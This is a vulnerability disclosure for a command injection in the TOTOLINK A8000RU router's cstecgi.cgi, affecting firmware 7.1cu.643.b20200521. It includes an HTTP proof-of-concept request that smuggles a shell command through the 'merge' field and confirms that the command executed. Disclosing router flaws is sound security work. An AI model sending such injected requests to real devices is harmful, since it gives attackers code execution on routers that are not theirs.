# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview A command injection vulnerability was discovered in the `cstecgi.cgi` of the TOTOLINK A8000RU router. An attacker can execute arbitrary operating system commands on the router by crafting malicious requests. The vulnerability is located in the `sub_421D08` function, which reads the user-provided parameter `merge` and passes its value to the `Uci_Set_Str` function. However, the value of `merge` is inserted into `v11`, processed with `snprintf`, and ultimately executed by the `CsteSystem` function via `execv`. ## Impact Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643.b20200521 - **Vulnerability Type**: Command Injection ## Remediation No specific remediation has been provided on the page. It is recommended to contact the vendor TOTOLINK for security updates or patches. ## Proof of Concept (PoC) ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 75 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=1772465702.2 Connection: keep-alive {"topicurl":"setWiFiEasyGuestCfg","merge":" ls>./setWiFiEasyGuestCfg.txt "} ``` ## Result After submitting the HTTP request, it was observed that the `txt` file was successfully created, containing the list of filenames in the directory. This confirms that the command `ls>./setWiFiEasyGuestCfg.txt` was successfully executed.